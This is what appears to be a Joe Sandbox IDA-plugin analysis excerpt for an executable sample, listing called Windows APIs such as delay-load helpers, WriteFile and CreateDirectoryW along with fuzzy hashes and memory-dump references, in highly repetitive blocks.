                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: 2Y$PDu<Y
                                                                                                                    • API String ID: 1269201914-1799397356
                                                                                                                    • Opcode ID: 8d420f774104a4721ed0b5683527e51296926afce941d2837847f8b01c1cf60e
                                                                                                                    • Instruction ID: 0f173911e5b281cc40d512f2a78e10b4b797612acaf0687f62097dbd826c7de7
                                                                                                                    • Opcode Fuzzy Hash: 8d420f774104a4721ed0b5683527e51296926afce941d2837847f8b01c1cf60e
                                                                                                                    • Instruction Fuzzy Hash: A9B012D22680417D3608D14D1D0FE7F0E4CF0C1F1033044BEF444C1080FC405D010431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: (Y$PDu<Y
                                                                                                                    • API String ID: 1269201914-1312676296
                                                                                                                    • Opcode ID: cfb9086bfee4d36fedcb414520d534c3988f6bfbc8c4d108ea82c83c14e1d000
                                                                                                                    • Instruction ID: 3b92d01869cc31b8c5ac76e46f2ed08aa23945db8996af848e99610b7a7af8b7
                                                                                                                    • Opcode Fuzzy Hash: cfb9086bfee4d36fedcb414520d534c3988f6bfbc8c4d108ea82c83c14e1d000
                                                                                                                    • Instruction Fuzzy Hash: F8B012D12680817C3608D14D1E0FD7F0E4CF0C1F20330847EF444C1080FC405C020431
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0058D343,00000001,?,?,?,00000000,0059551D,?,?,?), ref: 00589F9E
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0059551D,?,?,?,?,?,00594FC7,?), ref: 00589FE5
                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0058D343,00000001,?,?), ref: 0058A011
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4209713984-0
                                                                                                                    • Opcode ID: 0190a3de19b3f6fe98c1bd195b14de8e456453d82d369a02892f1bdc95e030ed
                                                                                                                    • Instruction ID: fb23d50dafe22e93ec6e2ae5f83369201adc0a2a1bbc912e437dae2ea5cd0f19
                                                                                                                    • Opcode Fuzzy Hash: 0190a3de19b3f6fe98c1bd195b14de8e456453d82d369a02892f1bdc95e030ed
                                                                                                                    • Instruction Fuzzy Hash: B9317F31244305EFEB15AF20D818B7A7BA5FF94715F044A19F981BB290C775AD48CBA2
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0058C27E: _wcslen.LIBCMT ref: 0058C284
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A2D9
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A30C
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A329
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2260680371-0
                                                                                                                    • Opcode ID: 55e8c1d37afa981280d43fa3a0a2d39473dc6f3b9e9316a0ba1bc5b9b8d7a71d
                                                                                                                    • Instruction ID: b7c38cd8e86259d6fe1d2a5125e6deed337c2812312ebc8361e71a16e1719e09
                                                                                                                    • Opcode Fuzzy Hash: 55e8c1d37afa981280d43fa3a0a2d39473dc6f3b9e9316a0ba1bc5b9b8d7a71d
                                                                                                                    • Instruction Fuzzy Hash: F601B135200614AAFF21BB758C0DBED3F48BF1A781F044816FD42F6092EB64DA8187B2
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 005AB8B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                    • Opcode ID: f63147f719d5073e1d85b2390409450487406fade964bf543595626b2d854507
                                                                                                                    • Instruction ID: b40e33610a45ddd0be196ac34d1a57a0c872f3537b26136433e79fd2ad493d6d
                                                                                                                    • Opcode Fuzzy Hash: f63147f719d5073e1d85b2390409450487406fade964bf543595626b2d854507
                                                                                                                    • Instruction Fuzzy Hash: 8141C87050428C9EEB218E68CC85BFABFBDFB56304F1404EDE59A86143D335AA45DBA1
                                                                                                                    APIs
                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 005AAFDD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String
                                                                                                                    • String ID: LCMapStringEx
                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,005AA56F), ref: 005AAF55
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                    Similarity
                                                                                                                    • API ID: Alloc
                                                                                                                    • String ID: FlsAlloc
                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 55e4d17e85203d8cfd92b175675860fce66452a8f7741a2f90924dcd999095f3
                                                                                                                    • Instruction ID: 6859edcb12d047b85710ac2623d3ba8fcecf889edcb2d0ab7b276e393b991a2b
                                                                                                                    • Opcode Fuzzy Hash: 55e4d17e85203d8cfd92b175675860fce66452a8f7741a2f90924dcd999095f3
                                                                                                                    • Instruction Fuzzy Hash: 36B012E1268042AC361CD1561C0BD370D8CF0C2B10330843EFC45C50C0DC40BC816431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 6c4c7502609cbe9a28d614f045576b4ae4399cf7b50c0d21366d8272f743c299
                                                                                                                    • Instruction ID: f7494278825012ec44214f5b99d8f433d8537b6871d4a187124a3c98db21c256
                                                                                                                    • Opcode Fuzzy Hash: 6c4c7502609cbe9a28d614f045576b4ae4399cf7b50c0d21366d8272f743c299
                                                                                                                    • Instruction Fuzzy Hash: BDB012E1279082AC361CD1461C0BD370D8DF4C1B10330447EF846C50C0DC407C815431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 4cbc9d692e9b0558c396625652ae62b4b08836e72ee01ea14e6caf2a1d03e6a7
                                                                                                                    • Instruction ID: c2ad965bb31cc818f00137cb52b2d062f798194d8e21f6cc2aaf5927d697e880
                                                                                                                    • Opcode Fuzzy Hash: 4cbc9d692e9b0558c396625652ae62b4b08836e72ee01ea14e6caf2a1d03e6a7
                                                                                                                    • Instruction Fuzzy Hash: 4EB092B1268042AC26189146180BD360D4CE1C2B10320842EF845C50809840A9815431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 2e40a94ef21ae6c9e752b145de3c54c4a3e7538f143d83ffff30591d2d8a09c6
                                                                                                                    • Instruction ID: c87c527c52a9454b1fa890feaa2fdf94c9754cd9bd85b7843dc84c929e396ed6
                                                                                                                    • Opcode Fuzzy Hash: 2e40a94ef21ae6c9e752b145de3c54c4a3e7538f143d83ffff30591d2d8a09c6
                                                                                                                    • Instruction Fuzzy Hash: 6BB012E1268042BC361CD2461D0BD370D4CF0C1B10330843EF885C51C0DC507D8A5431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 534abd32a1c903c66e345fd1012ad6b2b1a39ab71146982bea7e80532c417c7e
                                                                                                                    • Instruction ID: 79b4905a94d4630322679cbe1943d32f3ed1d6eede4d4b0eb8a515da5a57bbe5
                                                                                                                    • Opcode Fuzzy Hash: 534abd32a1c903c66e345fd1012ad6b2b1a39ab71146982bea7e80532c417c7e
                                                                                                                    • Instruction Fuzzy Hash: 3FB012E1368182BC365CD2462C0BD370D4CF0C1B10330853EF885C51C0DC407CC55431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: c2ef24bd0235a93515bb7013093da71c85ad8679596810f81cd9652d7b6f21ed
                                                                                                                    • Instruction ID: 89620ffeb9b0c98cdd09d02f7d6ff9d856d99592ad3770da8002a3b71ff70fb5
                                                                                                                    • Opcode Fuzzy Hash: c2ef24bd0235a93515bb7013093da71c85ad8679596810f81cd9652d7b6f21ed
                                                                                                                    • Instruction Fuzzy Hash: 52B012F1268042AC361CD1471C0BD370D4CF1C1F10330447EF845C50C0DC407D815431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 32833253e090f5e36d2a0a00c3a6c77bab39350a0076dc4beeaaabf712c62b9f
                                                                                                                    • Instruction ID: 94a390fc80209ee9a59d2c2721d11f8c6de5742aa08fd4ad9f1eac7b9c99e0c9
                                                                                                                    • Opcode Fuzzy Hash: 32833253e090f5e36d2a0a00c3a6c77bab39350a0076dc4beeaaabf712c62b9f
                                                                                                                    • Instruction Fuzzy Hash: 2DB012F1268042AC361CD1461D0BD370D4DF1C1F10330443EF845C50C0DC407E825431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059EAF9
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: 3Ro
                                                                                                                    • API String ID: 1269201914-1492261280
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
